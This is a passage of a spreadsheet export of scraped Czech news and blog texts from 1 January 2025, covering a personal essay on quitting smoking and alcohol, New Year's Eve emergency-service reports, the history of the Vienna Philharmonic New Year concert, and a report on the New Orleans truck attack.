jsem kolem trafiky a vnitřní boj sama se sebou jsem nakonec vyhrála. Po 14 dnech už mi cigareta nechyběla. Čas, který jsem kdysi věnovala kouření, jsem věnovala smysluplnějším činnostem. A alkohol ? Ten jsem pila opravdu jen příležitostně. Někdy večer jsem si doma nalila skleničku vína a lépe se mi i usínalo. Ale zjistila jsem, že jsem ráno nějaká unavená, pak jsem zjistila (při hlubším zadumání), že tu skleničku vlastně nepotřebuji, že ji mohu nahradit dobrým čajem. A tak jsem v obchodě přestala kupovat víno . Ano, šla jsem mezi regály a viděla ten sortiment vín a znala všechny dobré a kvalitní značky, ale řekla jsem si - proč bych měla sáhnout po dobré lahvince vína ? Proč vlastně? Pro dobrý pocit nebo hezký večer sama se sebou a skleničkou v ruce? A tak jsem jednoho dne už v obchodě žádné víno nekoupila. A řeknu vám, že za ten super pocit, (že jste to dokázali - nekouřit a nepít), opravdu stojí za to zapojit mozek, být pevně rozhodnut změnit styl života, stravování, více se hýbat, myslet na to, co do těla dáváte a jak se vám tělo odvděčí, mít se více rádi, tak za to to stojí. Je to o pevné vůli, tedy - vědomě si říci - DOST! Dokážu to! Ujede mi autobus? Nevadí. Nečekám další hodinu na další, ale beru to pozitivně a jdu pěšky. Řeknu si - „fajn, kardio, srdíčko bude hezky pumpovat, svaly se budou hýbat, pozitivní naladění v duši a jdu“. V obou rukách těžké tašky s nákupem, páteř a kyčle bolí, ale dokud se hýbu, žiju. Poztivní myšlení je jedním ze základních kamenů v tom něčeho dosáhnout. Samozřejmě vím, že má osobní zkušenost nemůže být návodem na lepší život pro všechny. Spousta lidí pevnou vůli nemá a musí jít cestou pomoci od svého okolí. Odborníků, rodinných příslušníků. Ale ve většině případů lze se sebezapřít a dokázat to. Pokud ovšem nemáte vážné zdravotní problémy. Píši zde o novoročních reálných předsevzetích, ne o zdravotních komplikacích. Pokud se tedy rozhodnete dát si jakékoli novoroční předsevzetí, dávejte si reálné cíle, o kterých víte, že můžete sami ovlivnit a úspěšně zvládnout. Rozvrhněte si například časově, do kdy chcete něčeho dosáhnout. Pochvalte se nebo se nějak odměňte za to, že jste něčeho dosáhli a nezapomeňte v tom pokračovat. Buďte na sebe pyšní, když něco zvládnete. Nepřestávejte při prvním neúspěchu. A hlavně si věřte ! Věřte, že jste natolik silní, že svého nelehkého cíle dosáhnete. Ono to totiž opravdu jde! https://www.asenior.cz/novorocni-predsevzeti-prani-nebo-prikaz/ https://www.sphere.cz/blog/novorocni-predsevzeti/ https://www.ceskenoviny.cz/zpravy/2614262</t>
  </si>
  <si>
    <t>20250101_264_3694959268_c15aa05b5751e9ea1f02.html</t>
  </si>
  <si>
    <t>c15aa05b5751e9ea1f02</t>
  </si>
  <si>
    <t>Těsně před půlnocí: Na Jičínsku se pokusil nezvaný host dostat do pizzerie</t>
  </si>
  <si>
    <t>Těsně před půlnocí: Na Jičínsku se pokusil nezvaný host dostat do pizzerie Již krátce po 21. hodině obdržela policie oznámení o podnapilém řidiči osobního automobilu Volkswagen v Hradci Králové . Po jeho zastavení bylo zjištěno, že řidič měl v dechu 1,97 až 2 promile alkoholu . Muž byl zadržen a po vystřízlivění bude čelit procesním úkonům pro podezření z přečinu ohrožení pod vlivem návykové látky. Další kuriózní incident se odehrál po 22. hodině, kdy byl nahlášen řidič jedoucí v protisměru na dálnici D11. Ačkoliv policejní hlídky intenzivně prozkoumaly daný úsek dálnice, popsané vozidlo nenalezly. Ani dálniční kamery nezdokumentovaly podezřelý automobil. Požáry byly další výzvou, které se policisté museli postavit, zejména v součinnosti s hasiči. Nejčastěji šlo o požáry košů, kontejnerů, stromů a dokonce jednoho vozidla. Včasné zásahy zajistily minimalizaci škod. Z okolí Ke konci roku byla hlášena i oznámení o pohřešovaných osobách z obcí Špindlerův Mlýn , Skuhrov nad Bělou, Třebechovice pod Orebem a Mostek . Všechny případy měly šťastný konec a osoby byly v krátkém čase nalezeny. Na Silvestra policisté také opakovaně reagovali na použití pyrotechniky, přičemž v žádném případě nebylo zjištěno protiprávní jednání. Před půlnocí řešili i incident na Jičínsku, kdy se neznámý muž pokusil dostat do uzavřené pizzerie, avšak po příjezdu policie byl klid. Policie opět apeluje na všechny řidiče, aby byli během dnešního dne opatrní, zvláště při návratech z rekreací a oslav. Výrazně varuje před řízením pod vlivem alkoholu nebo jiných návykových látek. I s příchodem roku 2025 budou policejní hlídky nadále dohlížet na bezpečnost na silnicích a veřejný pořádek. Autor: Tomáš Cerman Autor person Tomáš Cerman</t>
  </si>
  <si>
    <t>3460</t>
  </si>
  <si>
    <t>20250101_265_3695044707_2e32529615747a1eafa2.html</t>
  </si>
  <si>
    <t>2e32529615747a1eafa2</t>
  </si>
  <si>
    <t>Jak se zrodily straussovské novoroční koncerty Vídeňské filharmonie?</t>
  </si>
  <si>
    <t>Jak se zrodily straussovské novoroční koncerty Vídeňské filharmonie? Kristýna Petišková, 01.01.2025 9:39 Vídeňská filharmonie byla založena v roce 1842, tedy před bezmála 183 lety. Za tu dobu se v ní vystřídalo mnoho generací hráčů, dirigentů a koncertních programů. Jedné tradici, která započala v roce 1928, však vídeňští filharmonikové zůstávají věrní – straussovské novoroční koncerty. Hudba dynastie Straussů však byla úspěšná již v 19. století. Proč trvalo téměř sto let, než se v orchestru populárně laděné novoroční koncerty prosadily? Zlatý sál, Musikverein, Vídeň – zkouška na Novoroční koncert Vídeňských filharmoniků 2025 s Riccardem Mutim (foto Benedikt Dinkhauser) Vzestup dynastie Straussů Prapočátky novoročních koncertů Vídeňské filharmonie spadají do 19. století a pojí se s vlivnou dynastií Straussů. Dodnes se na novoročních programech objevují převážně díla Johanna Strausse mladšího (II), mají zde ale místo i skladby Johanna Strausse staršího (III) či Johanna Strausse nejmladšího (I). Jejich totožná jména snad vzbuzují dojem, že děti staršího Johanna byly také vedeny k hudbě – není tomu tak. Johann Strauss starší naopak nechtěl, aby se jeho syn hudbě věnoval, ten však nedbal jeho zákazů. Za zády otce se učil hře na housle u koncertního mistra v otcově orchestru a u Josefa Drechslera si zařídil hodiny kompozice. Dokonce si ve svých devatenácti letech založil malý orchestr, a konkuroval tak orchestru svého otce – po otcově smrti oba dva orchestry sloučil. Ve vedení Straussova orchestru se pak střídal se svým bratrem Josefem Straussem a následně i Eduardem Straussem . Oba zmínění bratři také skládali vlastní hudbu, kterou vídeňští filharmonikové na novoročním koncertě představí tento rok. Od „jednodušší“ hudby k uznání Trvalo však dlouho, než se vídeňští filharmonikové rozhodli do svých koncertních programů skladby Straussů zařadit. Zpočátku se báli, aby si lidé jejich vážený orchestr nespojovali s tehdy populární, líbivou či „jednodušší“ hudbou. Chtěli svůj orchestr na společenském žebříčku dostat co možná nejvýše. Jejich obavy časem ustoupily, a to z velké časti i kvůli tomu, že Straussova dynastie začala být ceněna skladatelskými velikány jako byli Richard Wagner či Johannes Brahms – ten dokonce ke svému autogramu pro nevlastní dceru Johanna Strausse mladšího připojil úvodní melodii Na krásném modrém Dunaji . K němu připsal poznámku: „Tuto skladbu bohužel nesložil Johannes Brahms .“ Vídeňská filharmonie pak poprvé roku 1873 zahrála skladbu jednoho z rodiny Straussů – Vídeňskou krev od Johanna Strausse mladšího. Ten skladbu dirigoval a zároveň doprovázel hrou na housle. S filharmoniky vystoupil ještě několikrát poté, vždy s úspěchem, naposledy při uvedení předehry ke své operetě Netopýr v roce 1899. Tyto koncerty však nesouvisely s oslavami Nového roku. Hudba Straussů sice zaznívala na novoročních koncertech Orchestru Johanna Strausse či Tonkünstler Orchester, ale na to, aby jejich hudbu na Nový rok hráli vídeňští filharmonikové, si musela ještě pár desetiletí počkat. Dopomohla jim k tomu společenská posedlost kulatinami – v rámci oslav stého výročí narození Johanna Strausse mladšího se v roce 1925 pořádalo ve Vídni několik koncertů. Jeden z nich Vídeňská filharmonie věnovala jen jeho hudbě, a to pod taktovkou Felixe von Weingartnera. Od roku 1924 navíc filharmonikové rozšířili svůj dosah – jejich hudba se vysílala i na rádiových vlnách. Mezi léty 1928–1933 se tak do éteru vysílaly straussovské novoroční koncerty z Musikverein, které dirigoval Johann Strauss nejmladší. Zároveň ve stejné době pravidelně dirigoval straussovské koncerty Clemens Krauss na Salcburském hudebním festivalu. Když se pak dostal do vedení Vídeňské filharmonie , netrvalo dlouho a zorganizoval s orchestrem v Musikverein první oficiální novoroční straussovský koncert. Konal se 31. prosince 1939. Výtěžek z koncertu filharmonie byl však věnován na národněsocialistickou sbírku Kriegswinterhilfswerk, která měla podpořit vojáky ve válce. Hned následující rok se rozhlasové vysílání rozšířilo i do Německa . Říšský rozhlas, bohužel, využil povznášející hudbu Straussů k šíření své nacionalistické ideologie. Dirigenti a jejich role v tradici novoročních koncertů Clemens Krauss stál v čele Vídeňské filharmonie do konce války, poté musel z orchestru odejít, jelikož byl nařčen ze sympatizování s nacisty. Na několik let ho vystřídal dirigent Josef Krips. U něj nebylo pochyb, že nacistům nebyl nakloněn, jelikož on sám byl napůl židovského původu. Clemens Krauss byl však brzy zproštěn viny. Vyšlo najevo, že nejenže nesympatizoval s nacisty, naopak za války pomáhal židovským hudebníkům před nacisty uprchnout. Do filharmonie se proto v roce 1948 vrátil a dirigoval ji až do konce svého života. V roce 1954 ho nahradil Willi Boskovsky. Ten dirigoval straussovské novoroční koncerty další necelé čtvrt století. Jeho následovníkem se na dalších šest let stal Lorin Maazel . Od roku 1987 bylo k dirigování novoročního koncertu přizváno dalších patnáct dirigentů, někteří z nich se vracejí opakovaně. Nejčastěji tak činí Zubin Mehta či Riccardo Muti – ten se dirigování ujme i letos, 1. ledna 2025, a to již posedmé. Novoroční koncert Vídeňských filharmoniků 2025 1. ledna 2025, 11:15 hodin Zlatý sál, Musikverein, Vídeň Program Johann Strauss I.: Freiheits-Marsch (Pochod svobody), op. 226 Josef Strauss : Dorfschwalben aus Österreich (Rakouské vlaštovky), valčík, op. 164 Johann Strauss II.: Demolirer-Polka. Polka française, op. 269 Johann Strauss II.: Lagunen-Walzer (Lagunový valčík), op. 411 Eduard Strauss : Luftig und duftig, rychlá polka, op. 206 Johann Strauss II.: Předehra k operetě “Der Zigeunerbaron (Cikánský baron)” Johann Strauss II.: Accelerationen, valčík, op. 234 Josef Hellmesberger (Sohn): Fidele Brüder. pochod z operety “Das Veilchenmädchen” Constanze Geiger: Ferdinandus-Walzer, op. 10 (arr. W. Dörner) Johann Strauss II.: Entweder – oder! (buď – anebo!) rychlá polka, op. 403 Josef Strauss : Transactionen, valčík, op. 184 Johann Strauss II.: Annen-Polka (Anenská polka), op. 117 Johann Strauss II.: Tritsch-Tratsch, rychlá polka, op. 214 Johann Strauss II.: Wein, Weib und Gesang ( Víno , žena a zpěv), valčík, op. 333 Účinkující Vídeňská filharmonie Riccardo Muti – dirigent Nejaktuálnější zprávy ze světa hudby přímo do Vaší schránky [mc4wp_form id="339371"] Autor: Nikola Rubrika transition_slide Hudba</t>
  </si>
  <si>
    <t>2610</t>
  </si>
  <si>
    <t>2930</t>
  </si>
  <si>
    <t>20250101_266_3696282866_28ac13825fdc6d448d39.html</t>
  </si>
  <si>
    <t>28ac13825fdc6d448d39</t>
  </si>
  <si>
    <t>Středočeští hasiči mají za sebou pernou noc. Zasahovali u 106 událostí</t>
  </si>
  <si>
    <t>Středočeští hasiči mají za sebou pernou noc. Zasahovali u 106 událostí „Z toho bylo 62 požárů, přičemž za 47 z nich mohly oslavy příchodu nového roku. Ve 24 případech se jednalo o technickou pomoc, v 10 případech o dopravní nehodu, v pěti případech o ostatní pomoc, ve třech případech o únik nebezpečných látek a ve dvou případech šlo o planý poplach," napsali na síti X středočeští hasiči. V úterý 31. prosince museli hasiči zasahovat u 66 mimořádných událostí, což je podle statistiky HZS Středočeského kraje nadprůměrný počet za den. Profesionální jednotky požární ochrany ve spolupráci s podnikovými a dobrovolnými sbory vyjížděly celkem k třiceti požárům, z toho šestnáct souviselo se silvestrovskou zábavou. „Největší nárůst těchto požárů evidujeme mezi patnáctou a šestnáctou hodinou a následně od dvaceti hodin do půlnoci. Patří k nim i pět větších požárů," uvedl mluvčí středočeských hasičů Ladislav Holomčík. První z nich byl ohlášen krátce po dvacáté hodině z rekreační oblasti Svárov u Poříčí nad Sázavou, kde hořela chata. Plameny napáchaly škodu za pět set tisíc korun a hasičům se podařilo uchránit majetek ve výši dvou milionů korun. Proč začalo hořet, zjišťují vyšetřovatelé. play_fill Příbramsko „Druhým zásahem byl těsně před 21. hodinou požár bytu v Brandýse nad Labem , při kterém jsme předali jednu popálenou osobu do péče zdravotnických záchranářů. Škoda byla vyčíslena na osm set tisíc korun. I v tomto případě je příčina ve stádiu vyšetřování," dodal Holmčík. Skoro ve stejném čase zaznamenali hasiči požár drážního domku v katastru obce Kamenné Žehrovice na Kladensku, u kterého zasahovala i jednotka Správy železnic Kralupy nad Vltavou . Příčinu, škody a uchráněné hodnoty oznámí vyšetřovatelé po vyhodnocení získaných poznatků. V půl jedenácté večer pak hasiči likvidovali požár maringotky na okraji obce Ješín na Kladensku a podařilo se jim uchránit majetek ve výši jednoho milionu korun. Příčinou vzniku požáru bylo vznícení hořlavého materiálu od spalinové cesty. V Příbrami hořel byt Posledním a zároveň nejzávažnějším zásahem loňského roku byl požár bytu ve čtvrtém nadzemním podlaží panelového domu u nemocnice v Příbrami . Ze zakouřeného hořícího bytu hasiči vynesli jednu nadýchanou osobu, kterou následně předali do péče posádce zdravotnické záchranné služby . Škoda byla vyčíslena na pět set tisíc korun, včasným zásahem se však příbramským profesionálním hasičům s dobrovolnými kolegy z Bohutína , Březových Hor a Trhových Dušníků podařilo uchránit majetek za dvacet milionů korun. Příčina se stále vyšetřuje. close info Zdroj: se souhlasem HZS Středočeského kraje zoom_in Ze zásahů hasičů poslední den v roce 2024 a první den v roce 2025 ve Středočeském kraji . Mezi půlnocí a osmou hodinnou ranní přibylo dalších 40 mimořádných událostí, ke kterým museli hasiči vyjíždět. Z toho bylo třicet dva požárů a většina z nich souvisela s oslavami příchodu nového roku.Sedmnáct minut po třetí hodině ranní přijalo Krajské operační a informační středisko HZS Středočeského kraje informaci o požáru odpadu v obci Líbeznice v okrese Praha -východ. Po příjezdu první jednotky a rychlém průzkumu bylo upřesněno, že jde o požár přístřešku a zahradní techniky. Oheň napáchal škodu za pět set tisíc korun a ve stejné výši se podařilo uchránit i další majetek. Příčina je v šetření. Po čtvrté hodině ranní vyjely profesionální a dobrovolné jednotky likvidovat požár domečku na dopravním hřišti v Mnichově Hradišti na Mladoboleslavsku . Škody napáchané požárem byly stanoveny na dva miliony korun, také příčina tohoto požáru se vyšetřuje. Tři minuty před osmou hodinnou ranní byl ohlášen požár půdního prostoru rodinného domu v obci Ledce v okrese Mladá Boleslav . Plameny se podařilo dostat pod kontrolu krátce po deváté hodině. Škoda byla stanovena na jeden a půl milionu korun, uchráněný majetek na pět milionů. Příčinou vzniku požáru byla technická závada u komínu. close info Zdroj: se souhlasem HZS Středočeského kraje zoom_in Ze zásahů hasičů poslední den v roce 2024 a první den v roce 2025 ve Středočeském kraji . Silvestr byl náročnější než minulý rok Příchod nového roku byl pro hasiče ze Středočeského kraje náročnější než ten předchozí o 32 mimořádných událostí, což je nárůst o 46 procent. Policie sice nezaznamenala za včerejší den a noc žádnou mimořádnou událost, ale i přesto řešila mnohem více konfliktních případů než v běžný den. „Především se jednalo o rušení nočního klidu, různé formy napadání a bohužel i domácí násilí," uvedla Policie ČR na síti X. play_fill Příbramsko Středočeští záchranáři během silvestrovských oslav zasahovali u deseti pacientů, kteří se zranili zábavní pyrotechnikou. "Dále jsme měli v péči 46 lidí s intoxikací alkoholem," dodala mluvčí středočeských záchranářů Monika Nováková. První letošní výjezd v souvislosti se zábavní pyrotechnikou měla posádka z Kolína pět minut po půlnoci. "Během loňské 12tihodinové silvestrovské směny jsme ošetřili tři zraněné od pyrotechniky a dvanáct lidí s alkoholovou intoxikací," dodala pro srovnání mluvčí Nováková. "Za celý silvestrovský den, tedy až do půlnoci, kontaktovali občané policisty na lince tísňového volání s 285 telefonáty (vloni cca 300). Od půlnoci do šesté hodiny ráno pak přijali policisté sloužící na lince 158 celkem 150 oznámení (vloni 160)," uvedla policejní mluvčí Vlasta Suchánková. První nehoda na Mladoboleslavsku A čeho se nejvíce oznámení týkala? Lidé oznamovali hořící popelnice, koše, hořící krabice od pyrotechniky, stěžovali si ale i na hluk od petard. Každoročně dochází k různým potyčkám a napadením, většinou podpořena předešlou konzumací alkoholu a nejinak tomu bylo i letos. Policisté přijímali oznámení o hádkách, fyzických napadeních, někteří se zraněními skončili i v nemocnici. Tyto případy již policisté řeší v trestně-právní rovině, kdy prověřují "aktivitu" jednotlivých účastníků těchto incidentů, u kterých též nechyběl alkohol . "Méně bylo ale dopravních nehod, od silvestrovského rána do půlnoci přijali operační důstojníci 56 oznámení dopravních nehodách, po půlnoci do sedmé ráno pak pouze sedm. Jedna z nich se stala patnáct minut již v roce 2025 u v blízkosti železničního přejezdu u Rohatska na Mladoboleslavsku , kdy dívka r. 2004 zřejmě dostala při řízení smyk a havarovala s vozidlem, ve kterém seděly další osoby, do příkopu před železničním přejezdem. Dívka za volantem nadýchala něco málo přes desetinu promile," popsala Sucháková. play_fill Příbramsko Jednou z prvních událostí byl pak nahlášen skok 33letého muže z druhého patra domu na Příbramsku . Byl převezen do nemocnice a policisté zjišťují, co ho k takovému činu vedlo. "Na linku 158 přijímali policisté i spoustu oznámení, tedy spíše zbytečných a někdy až obtěžujících. Například od opilců, kteří měli potřebu policistům vulgárně a dost nevybíravě nadávat. Oproti tomu volali i ti, kteří jim za jejich práci děkovali, nebo se jim svěřovali se svými problémy a starostmi. Všechna tato volání policisté rychle ukončovali, aby tísňová linka nebyla blokována pro oznámení jakékoliv "tísně"," dodala Suchánková. Z pohledu policistů, kteří dvacet čtyři hodin sloužili na lince 158, nebyl poslední den roku 2024 podle Vlasty Suchánkové nijak vybočující či významně jiný než ten loňský. A to jak z pohledu počtu oznámených událostí, tak jejich obsahu. Nicméně neřešili žádnou dramatickou událost či kolizi, která by někoho stála život. Autor: Jana Hájíčková Autor person Jana Hájičková</t>
  </si>
  <si>
    <t>6650</t>
  </si>
  <si>
    <t>20250101_267_3694905551_c6aa5cb363f68fd71ba1.html</t>
  </si>
  <si>
    <t>c6aa5cb363f68fd71ba1</t>
  </si>
  <si>
    <t>Silvestr v Královéhradeckém kraji: Záchranáři zasahovali u 64 případů</t>
  </si>
  <si>
    <t>Silvestr v Královéhradeckém kraji : Záchranáři zasahovali u 64 případů Zdravotnické operační středisko, které zajišťovalo tísňovou linku 155, mělo během noční směny od 19:00 hodin 31. prosince 2024 do 7:00 hodin 1. ledna 2025 na starosti celkem 116 tísňových volání. Záchranáři zasahovali u několika incidentů, mezi nimiž byly i případy spojené s použitím zábavné pyrotechniky. Naštěstí šlo o méně závažné úrazy, především drobné popáleniny. Kromě toho bylo nutné řešit i několik případů intoxikace způsobených nadměrnou konzumací alkoholu . Záchranáři vyjížděli celkem šestkrát k intoxikovaným osobám, z toho dvakrát k dětem. Dalších deset výjezdů bylo zaměřeno na úrazy způsobené alkoholem , přičemž v šesti případech šlo o zranění v důsledku konfliktů mezi osobami. Během této silvestrovské noci zasahovaly výjezdové skupiny v Královéhradeckém kraji u 64 událostí, což představuje mírný pokles oproti loňskému roku. První výjezd v novém roce přišel už 18 minut po půlnoci, kdy záchranáři vyjeli k pacientovi z Trutnova , který utrpěl drobnou popáleninu na zápěstí. Letecká záchranná služba, která zakončila rok 2024 posledním vzletem již 25. prosince, měla v průběhu celého roku 858 vzletů, což je pouze o dva vzlety méně než v roce předchozím. Autor: Tomáš Cerman Autor person Tomáš Cerman Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>20250101_268_3694876199_a1cda8218320b3bb581f.html</t>
  </si>
  <si>
    <t>a1cda8218320b3bb581f</t>
  </si>
  <si>
    <t>Regionální magazíny</t>
  </si>
  <si>
    <t>Regionální magazíny Humpolec TV Jihlavsko TV Jihočeská TV Pelhřimov TV Praha TV Regiony TV Znojmo TV Zoo TV Cetoraz - Srážka s prasaty 1. ledna 2025 HASIČI PACOV : Cetoraz - Srážka s prasaty Střet s automobilem nepřežila dvě divoká prasata. K dopravní nehodě došlo u obce Cetoraz, kde se vozidlo VW Multivan střetlo s dvěma divokými prasaty, která mu náhle vběhla do jízdní dráhy. Ilustrační foto Pixabay Zasahující technika na místě: Stanice Pacov - cisternová automobilová stříkačka 30. Ke zranění osob při nehodě nedošlo. Požití alkoholu policisté u řidiče vyloučili. Dopravní nehodu šetří. Zdroj: Hasičský záchranný sbor Kraje Vysočina .</t>
  </si>
  <si>
    <t>122</t>
  </si>
  <si>
    <t>117</t>
  </si>
  <si>
    <t>20250101_269_3694865949_e79b6d9160cb8c8ee099.html</t>
  </si>
  <si>
    <t>e79b6d9160cb8c8ee099</t>
  </si>
  <si>
    <t>Bilance silvestrovské noci: Policisté zaznamenali 100 výjezdů a hledají nezvěstného muže, hasiči řešili 20 požárů</t>
  </si>
  <si>
    <t>Shrnutí Bilance silvestrovské noci: Policisté zaznamenali 100 výjezdů a hledají nezvěstného muže, hasiči řešili 20 požárů Jihočeští policisté a hasiči řešili o silvestrovské noci více než 100 výjezdů. Trápilo je rušení nočního klidu, sousedské spory i požáry popelnic a křoví. Jeden muž se pohřešuje. „Za dnešní noc jsme od půlnoci do 6:30 zaznamenali zhruba stovku událostí. Jednalo se převážně o přestupky, rušení nočního klidu, sousedské spory a vzájemná napadání. Na Táborsku se ztratil při odchodu z večírku senior. V noci již probíhala pátrací akce, vrtulník byl na místě také a bude se v pátrání pokračovat,“ popsala policejní mluvčí Lenka Krausová . Senior David Z. odešel po desáté večer z večírku v obci Dírná na Táborsku a od té doby ho nikdo neviděl. Na místě probíhala za pomoci vrtulníku, policistů a dobrovolných hasičů pátrací akce. Bude se pokračovat i dnes. Hasiči řešili okolo dvaceti požárů. „Bilance silvestrovské noci je tedy 14 požárů popelnic nebo odpadkových košů, 4 požáry křoví, porostů nebo thují a jeden požár chatky v Bežerovicích u Bechyně. Tam hořela chatka asi 8 × 8 m se škodou 100 tisíc korun, příčina vzniku se vyšetřuje. Celkem jsme měli 36 událostí,“ sdělila mluvčí hasičů Vendula Matějů . 2/2 Ve Starých Hodějovicích na Budějovicku došlo po půlnoci k požáru asi 40 thují u rodinného domu. Na videu je požár zachycen svědky události v době před příjezdem prvních jednotek. Hasiči ho dostali pod kontrolu 13 minut od nahlášení. pic.twitter.com/Kms9lFJNbY — HZS Jihočeského kraje (@HZS_jihocesky) January 1, 2025 Největším požárem silvestrovského dne, se škodou 800 tisíc korun, je požár garáže a dílny v Kloužovicích na Táborsku, o kterém hasiči informovali před polednem. Zásahem se podařilo uchránit majetek v hodnotě 3,5 milionu korun. Ve Starých Hodějovicích na Budějovicku došlo po půlnoci k požáru asi 40 tújí u rodinného domu. Hasiči ho dostali pod kontrolu 13 minut od nahlášení. Vyšebrodské hasiče pak zaměstnala pyrotechnika ve Vyšším Brodě . Požárníci v tu chvíli měli dost rušno, protože právě zasahovali také u dopravní nehody tří aut se třemi zraněnými u Studánek. „Loni jsme během silvestrovských oslav zaznamenali devět požárů, většinou popelnic a odpadkových košů. Letošní počty událostí se tak drží v intencích standardních oslav Nového roku," doplnila za hasiče Matějů. Zdravotníci řešili 121 událostí „K události okamžitě vyjely tři pozemní posádky z Vyššího Brodu a Českého Krumlova a vrtulník Letecké záchranné služby. Záchranáři na místě ošetřili tři zraněné: muže středního věku, který při nehodě utrpěl těžké zranění v oblasti hlavy a pánve. Letečtí záchranáři zraněného transportovali na traumacentrum českobudějovické nemocnice,“ popsala zásah u nehody u Studánek mluvčí jihočeských záchranářů Petra Kafková . Do Budějovic byla po poskytnutí obdobné péče transportována i druhá těžce zraněná osoba, sedmapadesátiletá žena, s podezřením na poranění v oblasti hrudníku, břicha a pánve. Třetí zraněná osoba, žena středního věku, utrpěla středně závažné poranění horní končetiny a hrudníku. Po poskytnutí přednemocniční neodkladné péče ji záchranáři předali do českokrumlovské nemocnice. Během silvestrovské noci pak řešila Zdravotnická záchranná služba 121 událostí, což je 70% zvýšení oproti průměrnému počtu výjezdů při běžných nočních směnách a je v přímé souvislosti s oslavami konce roku. V 19 případech se jednalo o úrazy pod vlivem alkoholu a intoxikace alkoholem , dalších šest osob se zranilo při vzájemných potyčkách. Například českobudějovičtí záchranáři společně s hasiči ve 21 hodin vyjížděli na pomoc muži, který pod vlivem alkoholu spadl do potoka a nebyl schopen se vlastními silami z vody dostat. Ve vodě strávil minimálně dvacet minut a byl podchlazený. Po ošetření na místě a zajištění tepelného komfortu jej zdravotníci předali do péče kolegům z urgentního příjmu českobudějovické nemocnice. Prachatičtí záchranáři ošetřili třicet minut po půlnoci mladistvou osobu intoxikovanou alkoholem . Českokrumlovští záchranáři zasahovali krátce před 23. hodinou u úrazu způsobeného pyrotechnikou. Událost se stala na Lipně . „Muži při odpalování explodovala pyrotechnika v ruce a zranila ho v oblasti dlaně a prstů ruky. Jednalo se o jediné zranění zábavní pyrotechnikou, které naši záchranáři letos na silvestra ošetřili,“ sdělila Kafková. Ta také doplnila, že všechna lůžka na protialkoholní záchytné stanici v Českých Budějovicích byla zaplněna již třicet minut po půlnoci. V průběhu posledního dne v roce zasahovaly posádky ZZS JčK také u devíti dopravních nehod. Autor: Tomáš Souček Autor person Tomáš Souček</t>
  </si>
  <si>
    <t>19940</t>
  </si>
  <si>
    <t>20250101_27_3697774987_f2167d9b2575dc659f9c.html</t>
  </si>
  <si>
    <t>f2167d9b2575dc659f9c</t>
  </si>
  <si>
    <t>Teror v New Orleans: 10 mrtvých! Řidič vjel s náklaďákem do davu, vezl vlajku ISIS a výbušniny</t>
  </si>
  <si>
    <t>Teror v New Orleans : 10 mrtvých! Řidič vjel s náklaďákem do davu, vezl vlajku ISIS a výbušniny 21:50 13:03 10 lidí dnes zemřelo a další tři desítky osob utrpěly zranění ve městě New Orleans poté, co nákladní auto vjelo do davu lidí, kteří ještě slavili příchod nového roku. Starostka města LaToya Cantrellová čin označila za „teroristický útok“. Policie řidiče zastřelila, řekli AP nejmenovaní federální činitelé. Podezřelý měl v době incidentu vlajku teroristické organizace Islámský stát, uvedla CNN s odvoláním na zdroje z bezpečnostní komunity. V autě byly rovněž nalezeny výbušniny. „Muž řídil pickup a jel po Bourbon Street velmi rychle, bylo to velmi úmyslné chování,“ řekla novinářům Anne Kirkpatricková z neworleanské policie. Podle ní se muž snažil přejet co nejvíce lidí. Dodala, že nebyl pod vlivem alkoholu a že postřelil dva policisty. Jejich zdravotní stav je stabilizovaný. Většina ze 30 zraněných jsou podle Kirkpatrickové místní obyvatelé, nikoli návštěvníci města. Pachatel po smrti a výbušniny v autě „Spolupracujeme s našimi partnery na vyšetřování tohoto útoku jako teroristického činu,“ uvádí se v prohlášení FBI , který případ převzal. FBI rovněž potvrdil předchozí informaci televize CNN a agentury AP, že podezřelého z útoku policie zastřelila. „Dotyčný zaútočil na příslušníky orgánů činných v trestním řízení a nyní je po smrti,“ uvedl úřad. Biden útok odsoudil Auto vjelo do davu lidí asi tři hodiny po půlnoci místního času (kolem 10:00 SEČ) na ulici Bourbon Street, která je proslulá rušným nočním životem. Stanice CNN uvedla, že město New Orleans se dnes večer také chystá na čtvrtfinále akce Sugar Bowl, v něm se utkají týmy dvou univerzit v zápase amerického fotbalu. Americký prezident Joe Biden v prohlášení Bílého domu uvedl, že nařídil vyčlenit veškeré zdroje potřebné pro vyšetření případu. Uvedl také, že žádný útok na Američany nebude tolerován a že násilí v jakékoliv podobě není ospravedlnitelné. Zvolený prezident Donald Trump , který se úřadu ujme 20. ledna, útok bez konkrétních podrobností spojil s nelegální migrací. Svůj příspěvek ohledně událostí v New Orleans začal větou, že „příchozí zločinci jsou daleko horší než zločinci, které máme v naší zemi“. Neuvedl ale, jak tento případ souvisí s migrací. Bývalý voják V pozdějším prohlášení byl útočník identifikován jako 42letý americký občan z Texasu jménem Shamsud-Din Jabbar. V autě, které bylo patrně z půjčovny, byla nalezena vlajka teroristické organizace Islámský stát. FBI se nyní snaží odhalit možné vazby podezřelého s teroristickými organizacemi. Podle agentury AFP mají vyšetřovatelé podezření, že útočník - bývalý voják - nejednal sám. Úřad dále uvedl, že ve vozidle byly nalezeny zbraně a výbušniny. Další podomácku vyrobené bomby byly objeveny ve Francouzské čtvrti New Orleans , kde se incident odehrál. Vyšetřovatelé nyní zjišťují, zda byly funkční. „Byla nalezena improvizovaná výbušná zařízení a snažíme se potvrdit, zda byla použitelná,“ citovala CNN kancelář FBI v New Orleans . Bez informací o Češích České ministerstvo zahraničí nemá informace o tom, že by se nešťastná událost nějak dotkla českých občanů, sdělil ČTK mluvčí Daniel Drake . „Naše ambasáda i honorární konzul v New Orleans jsou v kontaktu s místními úřady a situaci monitorují. Nemáme informace o tom, že by se nešťastná událost nějak dotkla českých občanů,“ sdělil ČTK mluvčí české diplomacie Drake . Macron: Myslíme na rodiny obětí „ New Orleans , tak drahý srdcím Francouzů, byl zasažen terorismem. Myslíme na rodiny obětí a zraněných, stejně jako na americký lid, jehož zármutek sdílíme,“ reagoval na tragédii francouzský prezident Emmanuel Macron k dnešním událostem ve městě, které začátkem 18. století založili francouzští kolonisté. Hluboký zármutek a plnou solidaritu s oběťmi a jejich rodinami vyjádřila také šéfka unijní diplomacie Kaja Kallasová . Pro podobné násilí neexistuje omluva; v této tragické chvíli vyjadřujeme solidaritu s oběťmi a s jejich rodinami, uvedla Kallasová . Video Amerikanista Klvaňa v Blesku o nové Trumpově vládě: Musk může mít stejný problém jako Babiš - Pavlína Horáková, Daniel Kristl Video se připravuje... nadčasový MP ( 2. ledna 2025 10:19 ) Být introvertem má něco do sebe. Nemá potřebu srocování se s ostatními a neustále něco slavit. Nesetká se s 